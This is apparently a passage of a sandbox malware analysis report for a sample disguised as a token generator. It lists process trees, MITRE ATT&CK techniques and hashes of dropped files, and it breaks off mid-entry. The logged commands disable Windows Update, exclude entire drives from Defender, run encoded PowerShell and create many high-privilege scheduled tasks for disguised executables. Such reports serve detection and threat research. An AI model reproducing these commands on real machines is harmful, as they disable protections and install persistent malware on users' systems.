PID:3060

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:2160

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:4560

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:1764

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:1148

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:4872

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:2880

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies registry key
PID:4804

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:4808

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:3548

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4636

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2312

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:3916

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:3332

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:3172

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:3776

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:3408

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:3824

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:1088

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:3400

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:4560

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:4436

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:4712

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
PID:1668

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
PID:844

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
PID:112

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAegAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgBjAGgAcgAuAGUAeABlACIAJwApACAAPAAjAGgAdAB5AHYAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBzAGEAeAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAawAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAEcATgBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxACMAPgA7AA=="
5⤵
PID:1468

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"
5⤵
PID:1980

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineGNC"
6⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\3.exe
"C:\Users\Admin\AppData\Local\Temp\3.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4328

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comsavesbroker\9vifgPznNWM81sSYpbQjkuUh7.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\comsavesbroker\containersavesdhcp.exe
"C:\comsavesbroker\containersavesdhcp.exe"
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
8⤵
PID:3948

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
8⤵
PID:2644

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
8⤵
PID:4000

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comsavesbroker/'
8⤵
PID:1132

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
8⤵
PID:1148

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
8⤵
PID:3012

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
8⤵
PID:4268

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
8⤵
PID:4656

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
8⤵
PID:376

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
8⤵
PID:852

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
8⤵
PID:1080

C:\odt\WmiPrvSE.exe
"C:\odt\WmiPrvSE.exe"
8⤵
PID:4300

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
8⤵
PID:1056

C:\comsavesbroker\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
8⤵
PID:5024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3180

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
4⤵
PID:212

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe"
4⤵
- Views/modifies file attributes
PID:2152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4268

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\comsavesbroker\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\comsavesbroker\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\comsavesbroker\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\2.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "2" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\2.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\2.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\odt\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BackgroundTransferHostB" /sc MINUTE /mo 7 /tr "'C:\odt\BackgroundTransferHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BackgroundTransferHost" /sc ONLOGON /tr "'C:\odt\BackgroundTransferHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BackgroundTransferHostB" /sc MINUTE /mo 8 /tr "'C:\odt\BackgroundTransferHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\comsavesbroker\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\comsavesbroker\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\comsavesbroker\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\odt\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 10 /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\comsavesbroker\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\comsavesbroker\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\comsavesbroker\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\odt\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2880

C:\Program Files\Google\Chrome\updaterchr.exe
"C:\Program Files\Google\Chrome\updaterchr.exe"
1⤵
PID:1308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="
2⤵
PID:2160

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updaterchr.exe

Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Program Files\Google\Chrome\updaterchr.exe

Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f5f268a3d8760169bde3db6e00da5e6c

SHA1
00dc2443a967bf09147612f53ea5fc6a2cfb0b40

SHA256
b0f800d487f826601ef6a21ddd141c41d57182c1601e2adf1c0132b98c8d73b5

SHA512
c067de9cfefea861a08a29a1b10bcf93d360ec555bdd9fd24fb8f6ce6be432961a1acc4ccef786e953d86ef836db27fdef5fd5951930edd00e1c4fcfa3a9d67e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ebccc033a2da1d0601a4b23a1c7444d

SHA1
7fda1e23d8b4956f9f07df6fe940438acd3e620e

SHA256
80d4a73c2140e73f8f9c7e03feee6cf20e100247759fae93356e5e918576db27

SHA512
02fe8a687a1329e53a39b9956fba6c5253d1b4861e5de5ae71fa0684a007342f8e5b80474e8b1721ef0f9044a65c7f6c9b541117ea5059f7dfb57335abda1b2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f5fc6519219e8ab530a865e149a92a02

SHA1
c87b95f3c358c6b12da350bb978ff195d2feb060

SHA256
0420d40d4963dede50b4fb06bcd7ed341e9bae388c8cade178c52d0f4088d23f

SHA512
dcd64a54d777f4832b959f91f4deea1106a6065dd7d0421d47e5de28a227033387bc9af695111b669aad7b2b36922ef09e5384628c708fe595e7daff7bb5468e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f5fc6519219e8ab530a865e149a92a02

SHA1
c87b95f3c358c6b12da350bb978ff195d2feb060

SHA256
0420d40d4963dede50b4fb06bcd7ed341e9bae388c8cade178c52d0f4088d23f

SHA512
dcd64a54d777f4832b959f91f4deea1106a6065dd7d0421d47e5de28a227033387bc9af695111b669aad7b2b36922ef09e5384628c708fe595e7daff7bb5468e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
95KB

MD5
3b3e2bc601dac2d09e1ab65f96663f91

SHA1
410bb26b72c02f167bfd56e83f2db34fe8b60419

SHA256
2bcd24986fea58a62705365eca7f83b03cdd7fc645c050ac377c81ab7bbbd387

SHA512
40d943f98846e332a11ec56eb808fc9053eadb25667c8b91e7f2f80611a0cead3ccdbb4b3e75b6538f66ee03645e35cdcfc76199b9dcc6ec2378233cc4b05bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
95KB

MD5
3b3e2bc601dac2d09e1ab65f96663f91

SHA1
410bb26b72c02f167bfd56e83f2db34fe8b60419

SHA256
2bcd24986fea58a62705365eca7f83b03cdd7fc645c050ac377c81ab7bbbd387

SHA512
40d943f98846e332a11ec56eb808fc9053eadb25667c8b91e7f2f80611a0cead3ccdbb4b3e75b6538f66ee03645e35cdcfc76199b9dcc6ec2378233cc4b05bbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe

Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe

Filesize
4.3MB

MD5
e0ec197ba6e02af435a5230b8f4331b3

SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a

SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed

SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe

Filesize
3.0MB

MD5
c694007ac061e76162b9b0c12d785e11

SHA1
7b29c56bdbfa3d27691ac82f973791c55cc68c49

SHA256
810eb018db746edecd676a6dc48be59007f55338895b1a898721dfc769e1e992

SHA512
4fa8ec3a39e4257943f432ce1b2a44da157e1fcdcd0819ba0267672b24c0831b03b0c59ae0c95c60801547c2fec7d83c58d6bf2070907166725be3ae3edb382a

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.exe

Filesize
3.0MB

MD5
c694007ac061e76162b9b0c12d785e11

SHA1
7b29c56bdbfa3d27691ac82f973791c55cc68c49

SHA256
810eb018db746edecd676a6dc48be59007f55338895b1a898721dfc769e1e992

SHA512
4fa8ec3a39e4257943f432ce1b2a44da157e1fcdcd0819ba0267672b24c0831b03b0c59ae0c95c60801547c2fec7d83c58d6bf2070907166725be3ae3edb382a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TokenGenerator.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe

Filesize
216B

MD5
83c65c5fb5d6cae5d1a56338d81546d8

SHA1
da674eea76da502aeba2c0a63d551dc9d243c561

SHA256
c4010b41b3ee553d967decf86d7856464f9ae29bfd5334cd602f24cd14424783

SHA512
0d5b0b94d8ec8d53539044ab5805547c12cbe4ca87d0c74e5b768f1904794a820a3fd5e662dc16d0232c60efc1491c79731975f55b2da12139d70e4ef8d1f9b6

Download Submit
C:\comsavesbroker\9vifgPznNWM81sSYpbQjkuUh7.bat

Filesize
42B

MD5
44d17cedd450404d8c00269b1524e8b3

SHA1
a220bcaa6f9116982f01d96ed0cf8e8e71a731c5

SHA256
353034b198126f85e5c8cfbdd287d525cbd2abd3c827260cca2d1d54ab372d46

SHA512
e1dd54671bcd0d0b97b11fd74447ff07978efbafee4d35d68bdef94e35078e0f84f6c1be63f1e976d0729da9f21829afc22dd76aa5a84a31d7270b60d53b2c5d

Download Submit
C:\comsavesbroker\containersavesdhcp.exe

Filesize
2.7MB

MD5
